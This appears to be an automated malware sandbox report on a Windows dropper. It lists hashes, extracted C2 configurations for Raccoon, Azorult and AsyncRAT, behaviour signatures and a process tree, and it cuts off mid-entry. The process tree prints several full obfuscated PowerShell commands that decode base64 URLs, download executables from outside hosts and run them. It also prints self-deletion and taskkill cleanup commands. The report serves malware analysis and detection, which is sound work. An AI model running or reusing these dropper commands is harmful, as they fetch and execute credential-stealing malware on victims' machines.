Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    29-11-2020 07:28

General

  • Target

    8e84fa4f3e50e2bdc357c348b923a8b4.exe

  • Size

    210KB

  • MD5

    8e84fa4f3e50e2bdc357c348b923a8b4

  • SHA1

    8ccc6b05df9cd2ab9275e2848a997176b3cd41c8

  • SHA256

    0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1

  • SHA512

    cab0b936c6834068a94d55a7c3172b3b27766ddd41d5422ec2e4b1f2c0f39fa12f1258c4dc5483f061b635976ce398b91d274fbab812b64657ea3eb06e5dc81c

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://kfdhsa.ru/asdfg.exe

exe.dropper

http://kfdhsa.ru/asdfg.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://nicoslag.ru/asdfg.exe

exe.dropper

http://nicoslag.ru/asdfg.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/e5K5i

exe.dropper

http://bit.do/e5K5i

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/e5K4M

exe.dropper

http://bit.do/e5K4M

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/e5K4b

exe.dropper

http://bit.do/e5K4b

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bratiop.ru/asdfg.exe

exe.dropper

http://bratiop.ru/asdfg.exe

Extracted

Family

raccoon

Botnet

5e4db353b88c002ba6466c06437973619aad03b3

Attributes
  • url4cnc

    https://telete.in/brikitiki

rc4.plain
rc4.plain

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

C2

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    agentttt.ac.ug,agentpurple.ac.ug

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6970

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 8 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Async RAT payload 4 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 36 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8e84fa4f3e50e2bdc357c348b923a8b4.exe
    "C:\Users\Admin\AppData\Local\Temp\8e84fa4f3e50e2bdc357c348b923a8b4.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\48A4.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\8e84fa4f3e50e2bdc357c348b923a8b4.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\48A4.tmp\m1.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1156
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwygvqhixbak $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwygvqhixbak rwfxnse $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rwfxnse;fwygvqhixbak vdgyxptwz $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0Yg==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);vdgyxptwz $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:812
          • C:\Users\Public\psz.exe
            "C:\Users\Public\psz.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2652
            • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
              "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2780
              • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:2884
            • C:\Users\Public\psz.exe
              "C:\Users\Public\psz.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops desktop.ini file(s)
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Modifies system certificate store
              PID:2832
              • C:\Users\Admin\AppData\Local\Temp\AGX5BdQGy2.exe
                "C:\Users\Admin\AppData\Local\Temp\AGX5BdQGy2.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:2600
                • C:\Users\Admin\AppData\Local\Temp\AGX5BdQGy2.exe
                  "C:\Users\Admin\AppData\Local\Temp\AGX5BdQGy2.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:2052
              • C:\Users\Admin\AppData\Local\Temp\xB3Ix1zNAH.exe
                "C:\Users\Admin\AppData\Local\Temp\xB3Ix1zNAH.exe"
                7⤵
                • Executes dropped EXE
                • Modifies system certificate store
                PID:2728
                • C:\Windows\SysWOW64\svchost.exe
                  "C:\Windows\System32\svchost.exe"
                  8⤵
                    PID:2536
                • C:\Users\Admin\AppData\Local\Temp\q7CSunWjQu.exe
                  "C:\Users\Admin\AppData\Local\Temp\q7CSunWjQu.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2804
                  • C:\Users\Admin\AppData\Local\Temp\q7CSunWjQu.exe
                    "C:\Users\Admin\AppData\Local\Temp\q7CSunWjQu.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2016
                  • C:\Users\Admin\AppData\Local\Temp\q7CSunWjQu.exe
                    "C:\Users\Admin\AppData\Local\Temp\q7CSunWjQu.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2348
                  • C:\Users\Admin\AppData\Local\Temp\q7CSunWjQu.exe
                    "C:\Users\Admin\AppData\Local\Temp\q7CSunWjQu.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:2284
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\5lptrmuy.inf
                      9⤵
                        PID:856
                  • C:\Users\Admin\AppData\Local\Temp\po80zUeK1c.exe
                    "C:\Users\Admin\AppData\Local\Temp\po80zUeK1c.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2760
                    • C:\Users\Admin\AppData\Local\Temp\po80zUeK1c.exe
                      "C:\Users\Admin\AppData\Local\Temp\po80zUeK1c.exe"
                      8⤵
                      • Executes dropped EXE
                      PID:788
                    • C:\Users\Admin\AppData\Local\Temp\po80zUeK1c.exe
                      "C:\Users\Admin\AppData\Local\Temp\po80zUeK1c.exe"
                      8⤵
                      • Executes dropped EXE
                      PID:1328
                    • C:\Users\Admin\AppData\Local\Temp\po80zUeK1c.exe
                      "C:\Users\Admin\AppData\Local\Temp\po80zUeK1c.exe"
                      8⤵
                      • Executes dropped EXE
                      • Windows security modification
                      PID:2764
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        9⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2432
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\psz.exe"
                    7⤵
                      PID:2652
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        8⤵
                        • Delays execution with timeout.exe
                        PID:2972
                  • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
                    "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2812
                    • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
                      "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Checks processor information in registry
                      PID:2916
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 2916 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\769445636733353\\* & exit
                        8⤵
                          PID:1348
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 2916
                            9⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1920
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\48A4.tmp\m1a.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1224
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xrfhvszbucp $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xrfhvszbucp qtpbfnvsjwme $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|qtpbfnvsjwme;xrfhvszbucp pedzf $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);pedzf $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:432
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\48A4.tmp\b1.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1964
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ufnxmjsqb $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ufnxmjsqb mwsfev $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|mwsfev;ufnxmjsqb zwncmhjoglapft $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0TQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);zwncmhjoglapft $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1640
                  • C:\Users\Public\egj.exe
                    "C:\Users\Public\egj.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:2620
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\48A4.tmp\b1a.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1896
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xksqtuiezpom $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xksqtuiezpom najxgsmhtuwd $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|najxgsmhtuwd;xksqtuiezpom lubwzta $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);lubwzta $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1760
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\48A4.tmp\b2.hta"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1208
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL luhqmxbnvrt $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;luhqmxbnvrt pkzotxjl $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzotxjl;luhqmxbnvrt aiykpt $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs1aQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);aiykpt $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:748
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\48A4.tmp\b2a.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1712
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL qjezygpm $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;qjezygpm tykqrhcaxivo $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tykqrhcaxivo;qjezygpm yqvjfrouc $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);yqvjfrouc $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:344
              • C:\Users\Admin\AppData\Local\Temp\48A4.tmp\patch.exe
                patch.exe
                3⤵
                • Executes dropped EXE
                PID:1792

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          Modify Existing Service

          1
          T1031

          Defense Evasion

          Modify Registry

          4
          T1112

          Disabling Security Tools

          2
          T1089

          Install Root Certificate

          1
          T1130

          Credential Access

          Credentials in Files

          3
          T1081

          Discovery

          Query Registry

          2
          T1012

          System Information Discovery

          2
          T1082

          Collection

          Data from Local System

          3
          T1005

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03bfaf74-c48a-406b-812c-2684df821d22
            MD5

            597009ea0430a463753e0f5b1d1a249e

            SHA1

            4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

            SHA256

            3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

            SHA512

            5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b0b2f5a-4fa9-4284-9780-9a1da7b14a47
            MD5

            02ff38ac870de39782aeee04d7b48231

            SHA1

            0390d39fa216c9b0ecdb38238304e518fb2b5095

            SHA256

            fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

            SHA512

            24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_59e58351-f2a2-4992-a8e6-85b81cc2d538
            MD5

            354b8209f647a42e2ce36d8cf326cc92

            SHA1

            98c3117f797df69935f8b09fc9e95accfe3d8346

            SHA256

            feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239

            SHA512

            420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_85c7c16f-de6b-4cda-bf8a-ede9c5910d3d
            MD5

            df44874327d79bd75e4264cb8dc01811

            SHA1

            1396b06debed65ea93c24998d244edebd3c0209d

            SHA256

            55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

            SHA512

            95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8ebcaf0f-6f89-49d1-a0bc-359dbb5b1834
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a02197da-f9c8-43e6-9ff1-846e01d2d404
            MD5

            75a8da7754349b38d64c87c938545b1b

            SHA1

            5c28c257d51f1c1587e29164cc03ea880c21b417

            SHA256

            bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

            SHA512

            798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b771b377-145f-49e9-bf64-45e69646f7b9
            MD5

            5e3c7184a75d42dda1a83606a45001d8

            SHA1

            94ca15637721d88f30eb4b6220b805c5be0360ed

            SHA256

            8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

            SHA512

            fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c356f451-13b2-41fc-8d4c-54a293efa6e1
            MD5

            b6d38f250ccc9003dd70efd3b778117f

            SHA1

            d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

            SHA256

            4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

            SHA512

            67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce569c42-07bf-442e-b377-8e9695c9383c
            MD5

            be4d72095faf84233ac17b94744f7084

            SHA1

            cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

            SHA256

